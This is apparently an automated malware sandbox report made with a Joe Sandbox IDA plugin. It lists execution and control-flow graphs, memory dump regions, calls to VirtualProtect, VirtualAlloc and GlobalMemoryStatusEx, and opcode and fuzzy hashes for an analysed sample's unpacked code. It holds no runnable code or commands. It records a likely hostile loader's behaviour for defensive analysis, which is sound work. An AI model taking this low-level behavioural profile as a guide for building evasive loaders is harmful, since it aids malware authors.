                                                                                • Snapshot File: hcaresult_6_2_183d000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:7.1%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:38
                                                                                Total number of Limit Nodes:3
                                                                                execution_graph 7694 fa3ec0 7695 fa3ece 7694->7695 7696 fa3ed4 7695->7696 7702 fa455e 7695->7702 7705 fa686f 7695->7705 7709 fa6e0e 7695->7709 7712 fa4488 7695->7712 7715 fa4557 7695->7715 7719 fabad0 7702->7719 7708 fabad0 VirtualProtect 7705->7708 7706 fa688c 7707 fa45f1 7707->7705 7707->7706 7708->7707 7711 fabad0 VirtualProtect 7709->7711 7710 fa6e29 7711->7710 7727 fac850 7712->7727 7716 fa456a 7715->7716 7717 fa459b 7716->7717 7718 fabad0 VirtualProtect 7716->7718 7717->7717 7718->7717 7721 fabae3 7719->7721 7723 fabe98 7721->7723 7724 fabee0 VirtualProtect 7723->7724 7726 fa459b 7724->7726 7730 fac878 7727->7730 7732 fac88b 7730->7732 7734 fac928 7732->7734 7735 fac968 VirtualAlloc 7734->7735 7737 fa44a8 7735->7737 7738 ecd030 7739 ecd048 7738->7739 7740 ecd0a3 7739->7740 7742 fac2e0 7739->7742 7743 fac308 7742->7743 7746 fac610 7743->7746 7744 fac32f 7747 fac633 7746->7747 7748 fabad0 VirtualProtect 7747->7748 7750 fac6df 7747->7750 7749 fac6d3 7748->7749 7749->7744 7750->7744

                                                                                Control-flow Graph

                                                                                control_flow_graph 855 fabe98-fabf19 VirtualProtect 858 fabf1b-fabf21 855->858 859 fabf22-fabf47 855->859 858->859
                                                                                APIs
                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00FABF0C
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2232195392.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_fa0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                control_flow_graph 863 fac928-fac9a0 VirtualAlloc 866 fac9a9-fac9ce 863->866 867 fac9a2-fac9a8 863->867 867->866
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00FAC993
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2232195392.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_fa0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                control_flow_graph 929 ecd005-ecd042 931 ecd048 929->931 932 ecd0d3-ecd0da 929->932 933 ecd04a-ecd056 931->933 932->933 934 ecd05c-ecd07e 933->934 935 ecd0df-ecd0e4 933->935 937 ecd0e9-ecd0fe 934->937 938 ecd080-ecd09f call fac2e0 934->938 935->934 942 ecd0b5-ecd0bd 937->942 941 ecd0a3-ecd0b3 938->941 941->942 943 ecd10b 941->943 944 ecd0bf-ecd0d0 942->944 945 ecd100-ecd109 942->945 945->944
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2231904674.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_ecd000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                control_flow_graph 948 ecd030-ecd042 949 ecd048 948->949 950 ecd0d3-ecd0da 948->950 951 ecd04a-ecd056 949->951 950->951 952 ecd05c-ecd07e 951->952 953 ecd0df-ecd0e4 951->953 955 ecd0e9-ecd0fe 952->955 956 ecd080-ecd09f call fac2e0 952->956 953->952 960 ecd0b5-ecd0bd 955->960 959 ecd0a3-ecd0b3 956->959 959->960 961 ecd10b 959->961 962 ecd0bf-ecd0d0 960->962 963 ecd100-ecd109 960->963 963->962
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2231904674.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_ecd000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                control_flow_graph 966 69c6b6d-69c6b80 967 69c6bf6-69c6c8e 966->967 968 69c6b82 966->968 974 69c6c9a-69c6cb6 967->974 968->967 977 69c6cbc-69c6cbf 974->977 978 69c0072-69c0078 974->978 977->978 979 69c007a-69c06fa 978->979 980 69c0081-69cdbaa 978->980 979->978 987 69c0700 979->987 987->978
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2239331816.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_69c0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2239331816.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_69c0000_repeat.jbxd
                                                                                Execution Graph

                                                                                Execution Coverage:10.3%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:34
                                                                                Total number of Limit Nodes:3
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Control-flow Graph

                                                                                control_flow_graph 1188 5dcd2f8-5dcd303 1189 5dcd32d-5dcd34c call 5dcc6b4 1188->1189 1190 5dcd305-5dcd32c call 5dcc6a8 1188->1190 1196 5dcd34e-5dcd351 1189->1196 1197 5dcd352-5dcd3b1 1189->1197 1203 5dcd3b7-5dcd444 GlobalMemoryStatusEx 1197->1203 1204 5dcd3b3-5dcd3b6 1197->1204 1207 5dcd44d-5dcd475 1203->1207 1208 5dcd446-5dcd44c 1203->1208 1208->1207
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3256325546.0000000005DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_5dc0000_repeat.jbxd
                                                                                Control-flow Graph

                                                                                control_flow_graph 1211 5dcc6b4-5dcd444 GlobalMemoryStatusEx 1214 5dcd44d-5dcd475 1211->1214 1215 5dcd446-5dcd44c 1211->1215 1215->1214
                                                                                APIs
                                                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05DCD34A), ref: 05DCD437
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3256325546.0000000005DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_5dc0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalMemoryStatus
                                                                                • String ID:
                                                                                • API String ID: 1890195054-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                control_flow_graph 1218 5dcd3c8-5dcd40e 1219 5dcd416-5dcd444 GlobalMemoryStatusEx 1218->1219 1220 5dcd44d-5dcd475 1219->1220 1221 5dcd446-5dcd44c 1219->1221 1221->1220
                                                                                APIs
                                                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05DCD34A), ref: 05DCD437
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3256325546.0000000005DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_5dc0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalMemoryStatus
                                                                                • String ID:
                                                                                • API String ID: 1890195054-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                control_flow_graph 1287 2ebf635-2ebf663 1288 2ebf665-2ebf668 1287->1288 1289 2ebf68b-2ebf68d 1288->1289 1290 2ebf66a-2ebf686 1288->1290 1291 2ebf68f 1289->1291 1292 2ebf694-2ebf697 1289->1292 1290->1289 1291->1292 1292->1288 1294 2ebf699-2ebf6bf 1292->1294 1299 2ebf6c6-2ebf6f4 1294->1299 1304 2ebf76b-2ebf78f 1299->1304 1305 2ebf6f6-2ebf700 1299->1305 1313 2ebf799 1304->1313 1314 2ebf791 1304->1314 1309 2ebf718-2ebf769 1305->1309 1310 2ebf702-2ebf708 1305->1310 1309->1304 1309->1305 1311 2ebf70a 1310->1311 1312 2ebf70c-2ebf70e 1310->1312 1311->1309 1312->1309 1316 2ebf79a 1313->1316 1314->1313 1316->1316
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PH]q
                                                                                • API String ID: 0-3168235125
                                                                                • Opcode ID: fd832b32a3f5ea9aa1400965e2afbe52c87c258154842c962e11c45b7327511c
                                                                                • Instruction ID: 1c8edee345ec5c05997aa81ec92fd9044be0f0dfec89d81ae684e5178f7080db
                                                                                • Opcode Fuzzy Hash: fd832b32a3f5ea9aa1400965e2afbe52c87c258154842c962e11c45b7327511c
                                                                                • Instruction Fuzzy Hash: 3E310E30B402019FCB069B74D9546AF3BE3AF89244F1488B8E406DB784DF38CC86CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PH]q
                                                                                • API String ID: 0-3168235125
                                                                                • Opcode ID: aac24d0c20e3eaba9d24ba14aafd64197da4c7c4749b81b6712188d1dbc1adc0
                                                                                • Instruction ID: 2b2136add6c0ec206daf454c22e93a387fb23fe18863da9d0ed67754e466762c
                                                                                • Opcode Fuzzy Hash: aac24d0c20e3eaba9d24ba14aafd64197da4c7c4749b81b6712188d1dbc1adc0
                                                                                • Instruction Fuzzy Hash: 0331DD30B402059FDB0A9A74D9546AF3BE7AF88254B2088B8E406DB394DF38DD85CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LR]q
                                                                                • API String ID: 0-3081347316
                                                                                • Opcode ID: c0f079544efd2e94ac0511fd44bf430e5fcb36de18aee3b0a5e349741b4b2f6a
                                                                                • Instruction ID: a7d4b6e9165d4185d93800fa131c2aaf185c074253ca9dff2bbe8ca8295be5d8
                                                                                • Opcode Fuzzy Hash: c0f079544efd2e94ac0511fd44bf430e5fcb36de18aee3b0a5e349741b4b2f6a
                                                                                • Instruction Fuzzy Hash: 40318D71E902099BDB16CFA5D8447DEF7B1FF85308F109425F80AEB640DB70A842CB51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LR]q
                                                                                • API String ID: 0-3081347316
                                                                                • Opcode ID: 502d41184e30f6a52b55efd5295eca182521908bbabbde23fad18efef2803c46
                                                                                • Instruction ID: 0c89c5070519da3670ba80f130bff8693a5d2c71c0547a8fd864e43b84908af5
                                                                                • Opcode Fuzzy Hash: 502d41184e30f6a52b55efd5295eca182521908bbabbde23fad18efef2803c46
                                                                                • Instruction Fuzzy Hash: 0A314E71E502099BDB15CFA4D8947DEB7B2FF86308F209429F806FB650EB759842CB51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 971e0230c3c1c541b067211b8be4088f37d9ffb382f6ac41c9970722e4a7bb78
                                                                                • Instruction ID: ffcc4fef6264b319a7ac148d69b273e89197751ab9221e8faffe05c20b98c515
                                                                                • Opcode Fuzzy Hash: 971e0230c3c1c541b067211b8be4088f37d9ffb382f6ac41c9970722e4a7bb78
                                                                                • Instruction Fuzzy Hash: 82221634A402048FDB25CB68C994B9EB7F2EF49318F54D4AAE449DB765DB35EC82CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9805408abdd2a5d58a0b50edea0acfb410c70751abcfdb7d96a2b822bc5760aa
                                                                                • Instruction ID: e8093c0b697d1f4505c53542285e838d67f2b8df0f04f4fb9d4ac88b5e83f88c
                                                                                • Opcode Fuzzy Hash: 9805408abdd2a5d58a0b50edea0acfb410c70751abcfdb7d96a2b822bc5760aa
                                                                                • Instruction Fuzzy Hash: 74128F30B405429FCB1AAB28E49466977E7FFC5354B50A97AE006CB354CF39DC4ACB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8835e9a82e2b68901a979b6886badf33613315f1a7b7da5ae07f937dde7245d7
                                                                                • Instruction ID: b74d6dbe143e4058e4c902a7f30c9694e5765489f6bc4edaca35dc1057f19cfd
                                                                                • Opcode Fuzzy Hash: 8835e9a82e2b68901a979b6886badf33613315f1a7b7da5ae07f937dde7245d7
                                                                                • Instruction Fuzzy Hash: B0E15A34B402099FCB15DB68D584AAEBBB2EF89314F209469E50ADB395DB34DC42CF91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 11a6735664b305486235f3b58faf0e742bf102f2fbfe6fd470494bc0663d5dbe
                                                                                • Instruction ID: 5f4aad025a1bcb27d9830d98b5404597e540577eeab3714119388d27a81994db
                                                                                • Opcode Fuzzy Hash: 11a6735664b305486235f3b58faf0e742bf102f2fbfe6fd470494bc0663d5dbe
                                                                                • Instruction Fuzzy Hash: 0FB16CB0E40609CFDF11CFA8D8957EEBBF1AF88308F14D129D859A7295EB749845CB81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e7a8293f79726ca67209141cfc34af6fb0c3d6eb5d6fd976bc2df908365a4b7c
                                                                                • Instruction ID: 454bed8c9f11d780df4b07954d183566d166b02471232d70513330048da14e6a
                                                                                • Opcode Fuzzy Hash: e7a8293f79726ca67209141cfc34af6fb0c3d6eb5d6fd976bc2df908365a4b7c
                                                                                • Instruction Fuzzy Hash: A7B18B70E402098FDF11CFA8C9A17EEBBF1AF89718F14D529D814A7295EB749881CF91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0caa122d85cdd0285e1c3e6b18307e4ec2148ff07b9c3e332cf5ef0fc13e777e
                                                                                • Instruction ID: 0982e0ce256de8e16cb01d0f9756c1143201cb26cad8716e1f9acf4fc4252172
                                                                                • Opcode Fuzzy Hash: 0caa122d85cdd0285e1c3e6b18307e4ec2148ff07b9c3e332cf5ef0fc13e777e
                                                                                • Instruction Fuzzy Hash: 80916DB0E40209DFDF11CFA9C9957DEBBF2AF88318F14D129E419A7294EB349845CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9b9556a1efcc3160c0eb8cf06a4f5f9b7c4e0351d55da8a642bdfb04333cfa7a
                                                                                • Instruction ID: 4d3c287b1de1c7a57cbaab9c23bf17b8e4965927ef45944d64c9f053268abb50
                                                                                • Opcode Fuzzy Hash: 9b9556a1efcc3160c0eb8cf06a4f5f9b7c4e0351d55da8a642bdfb04333cfa7a
                                                                                • Instruction Fuzzy Hash: 258167B0E40259DFDF11CFA8D8947DEBBB2BF89318F14D129E414A7291EB349881CB95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8a6bdd30f234e7ffc87fd151f38ff6baae5f1b2401eae572abdec24757a8e974
                                                                                • Instruction ID: 22ac0d7d3bb621797a76627677aa3895c1c4b9ec5302e2346b0ac821390c92e6
                                                                                • Opcode Fuzzy Hash: 8a6bdd30f234e7ffc87fd151f38ff6baae5f1b2401eae572abdec24757a8e974
                                                                                • Instruction Fuzzy Hash: 2471ED32E045198BCB16CB59C8807FEF7F2EF84314F29D96AD455AB241C339AD81CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 12807680b401d7cc57de5229e5be56f312f4fbea2324fb2f5ff5ae3bd794aed8
                                                                                • Instruction ID: 79cf1718623cc5868c655187026efc9d7bb1ab014a211d6f6cd64d27585a79cc
                                                                                • Opcode Fuzzy Hash: 12807680b401d7cc57de5229e5be56f312f4fbea2324fb2f5ff5ae3bd794aed8
                                                                                • Instruction Fuzzy Hash: B0718CB0E002498FDF11CFA9C8917DEBBF2BF89308F14D129E415A7295EB349842CB95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6268a83f09649e7785d0dfc4ba1fc4bd5c2c612b69c7e926225041829721f0bb
                                                                                • Instruction ID: d15ceca15d5030e91929efba568ebe7f1a361bb4caba6962867f76d5cd83e99e
                                                                                • Opcode Fuzzy Hash: 6268a83f09649e7785d0dfc4ba1fc4bd5c2c612b69c7e926225041829721f0bb
                                                                                • Instruction Fuzzy Hash: 59513B75A00205CFDB04DFA9E884699FBB6FF88314F14C1AAE9099B396E774D845CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 99752f173d0bfe85e0ecbba1d0558837b90655616aefd0dbd18e81b65d737f91
                                                                                • Instruction ID: 06d03324340fff599e7e80b4a0166afd58f01cac20775a749b0bf6b55c8ddcf9
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 17a3ae052dbd2fcfcfb5916d130178e861a4bf6c1cc1ee3ac9287a230d24e191
                                                                                • Instruction ID: 1a3b05712d48c9979187dd81c1714891127f6e4347c7e71b10765e6d23f03a85
                                                                                • Opcode Fuzzy Hash: 17a3ae052dbd2fcfcfb5916d130178e861a4bf6c1cc1ee3ac9287a230d24e191
                                                                                • Instruction Fuzzy Hash: F3212730B802458BDB15DB64C5257EE77F6EF49254B105468D10AEB3A0DB368D01CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 46a884a1848351600afbd5585344c156e3b4bceba6924e1d5672e270a50bd291
                                                                                • Instruction ID: 4b2b025a8d1b1b117f1531fe6dd061902bd2c7814434d6d2b1dc3f90442f394c
                                                                                • Opcode Fuzzy Hash: 46a884a1848351600afbd5585344c156e3b4bceba6924e1d5672e270a50bd291
                                                                                • Instruction Fuzzy Hash: 6221CF34A405018FDB26EF3CF894B9A3759EF46328F109931D40ACB664EB3CDC598B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d197021cfacd787d73eda0e236b25c9461398c41487bfda92199b036c2090bdd
                                                                                • Instruction ID: cf1bbaa92855785d9cd468a558b2a8a38e46312fafa12f91fa69a2a6b431b181
                                                                                • Opcode Fuzzy Hash: d197021cfacd787d73eda0e236b25c9461398c41487bfda92199b036c2090bdd
                                                                                • Instruction Fuzzy Hash: FF210534A80209CFDB15DB79C568AAE77F2AF49305F5048A8E406EB3A0DB769D40CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 32a59b687a13a062b161693624d70f69d6bcbfc615684a0d118059ffa33de683
                                                                                • Instruction ID: 9976504fdbc988f40ba1040bf33d8df03c16506e7ab9e83ef51fcf9378a00441
                                                                                • Opcode Fuzzy Hash: 32a59b687a13a062b161693624d70f69d6bcbfc615684a0d118059ffa33de683
                                                                                • Instruction Fuzzy Hash: F8119E30A802049BEF266A79D9017EF369AEF81218F10D939E406DF251DB39EE458BD1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7943d73fb3502059152f8c6c7c8c9782d9951edd08bd209921c27a00d6edfeb9
                                                                                • Instruction ID: 3b197087c035442425f9ca1770e0d15efb565241a4599421435973452ee65a6b
                                                                                • Opcode Fuzzy Hash: 7943d73fb3502059152f8c6c7c8c9782d9951edd08bd209921c27a00d6edfeb9
                                                                                • Instruction Fuzzy Hash: FC11E330F802048BDF66AA79D5047AF369AEF45318F10D979E406DF251DB38EE858BC1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2c5f8d809bbc1020c66cea1ba55f063805f82334ea3a617bb39466f4009fd75a
                                                                                • Instruction ID: d531a254690f087558c2a8580229bfb922cefb3d9c2c4d20577d278626fb993c
                                                                                • Opcode Fuzzy Hash: 2c5f8d809bbc1020c66cea1ba55f063805f82334ea3a617bb39466f4009fd75a
                                                                                • Instruction Fuzzy Hash: D711C272F002519BCF119B78984969F7BE9FB49664F10853AE90AD7300EB34C8058792
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
